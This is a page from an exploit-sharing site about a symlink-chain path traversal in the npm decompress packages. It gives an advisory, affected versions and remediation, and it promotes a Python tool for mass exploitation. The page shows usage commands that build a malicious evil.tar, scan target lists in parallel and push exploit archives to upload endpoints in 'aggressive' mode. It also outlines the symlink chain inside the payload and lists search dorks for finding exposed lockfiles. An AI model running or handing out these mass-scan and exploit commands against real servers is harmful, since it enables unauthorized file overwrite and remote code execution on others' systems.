POCBIT

Telegram — New PoC releases & critical CVE alerts

You can join our Telegram channel to get instant updates on new PoC releases and critical CVE alerts.

Join @pocbit
Web appcritical

CVE-2026-101894 — @xhmikosr/decompress Symlink-Chain Archive Path Traversal

September 29, 2026 · 104 views

Node.js @xhmikosr/decompress (and unmaintained decompress): read/write outside output dir via chained symlink archive entries — bypass of CVE-2026-53486 hardening. Fixed in 10.2.2 / 11.1.4; kevva decompress ≤4.2.1 unpatched. CVSS 3.1 9.1 Critical. Python PoC: --lab, lockfile check, evil.tar upload exploit, mass -j.

#nodejs#npm#decompress#path-traversal#symlink#archive#tar#cwe-22#cwe-59#supply-chain#critical

CVE:

CVE-2026-101894

Date:

2026-09-29

Severity:

CRITICAL

Exploit source

PoC code is available to registered members only.

Description

Overview

CVE-2026-101894 — archive extraction in @xhmikosr/decompress (and legacy decompress) allows read/write outside the output directory via a chain of symlink entries, bypassing CVE-2026-53486 mitigations.

| | | |---|---| | Package | @xhmikosr/decompress (maintained), decompress (kevva, unpatched) | | API | Default decompress(input, output) | | CWE | CWE-22 path traversal, CWE-59 link following | | Fixed | 10.2.2 (10.x), 11.1.4 (11.x) | | CVSS 3.1 | 9.1 Critical | | GHSA | GHSA-hrh2-vp3x-79xf |

Lexical path checks fail when sequential symlink entries cause the kernel to resolve later entries outside the intended extract root. Attacker-controlled archives can overwrite or read configs, startup scripts, or sensitive files → RCE in CI, containers, and upload-and-extract services.

PoC page: https://pocbit.org/pocs/cve-2026-101894

GitHub: murrez/CVE-2026-101894

Affected versions

| Package | Vulnerable | Patched | |---------|------------|---------| | @xhmikosr/decompress 11.x | 11.0.0 – 11.1.3 | ≥ 11.1.4 | | @xhmikosr/decompress 10.x | < 10.2.2 | ≥ 10.2.2 | | decompress (kevva) | ≤ 4.2.1 | none — migrate |

Migrate legacy decompress to @xhmikosr/[email protected]+.

Bundled tool (Python 3)

Download poc.py from this page (View exploit code).

pip install -r requirements.txt

# Authoritative local proof (Node.js + npm required)
python poc.py --lab
python poc.py --write-evil-tar evil.tar

python poc.py -u https://app.example --mode check
python poc.py --list targets.example.txt --mode check -j 30 --vuln-list hits.txt

python poc.py -u https://app.example --mode exploit --aggressive
python poc.py --list hits.txt --mode exploit -j 10 --aggressive --upload-paths /api/upload,/upload

| Mode | Purpose | |------|---------| | --lab | Installs vulnerable 11.1.3 in lab/, verifies symlink-chain escape | | --write-evil-tar | Writes payload archive (POCBIT-101894-ESCAPED marker) | | check | Exposed package.json / lockfile → risky decompress version? | | exploit | POST symlink-chain evil.tar to common upload paths (mass supported) | | mass | --list + -j → hits.txt, exploited.txt |

Remote exploit proves 2xx upload acceptance + weak version fingerprint when lockfiles leak — not that the server actually extracted with decompress. Use --lab for definitive extraction proof.

Note: check → hits = public lockfile + vulnerable dep. exploit → exploited = at least one tried upload path returned 2xx. Many targets show vulnerable_dep_no_upload_endpoint (dependency leak without public archive upload).

evil.tar (concept)

Symlink chain (simplified):

  1. a/b/c/up → ../..
  2. a/b/escape → c/up/../..
  3. esc → ..
  4. Regular files with marker payload under escaped path

Matches the symlink-chain bypass class fixed in 11.1.4 (realpath / containment).

Remediation

  1. Upgrade @xhmikosr/decompress ≥ 11.1.4 (or ≥ 10.2.2 on 10.x).
  2. Replace unmaintained decompress entirely.
  3. Never extract untrusted archives into sensitive roots; use isolated workers.

Hunting (examples)

body="node_modules/@xhmikosr/decompress"
body="\"decompress\"" && body="package-lock.json"
header="X-Powered-By: Express" && body="/package.json"

Lockfiles are rarely public in production; checks often hit staging, CI artifacts, or misconfigured static hosting.

Legal and ethical use

Test only systems you are authorized to assess. Do not upload malicious archives to third-party production services.

References

Related PoCs

Same platform, vendor, or tags — explore more write-ups on Pocbit.

Browse full PoC archive →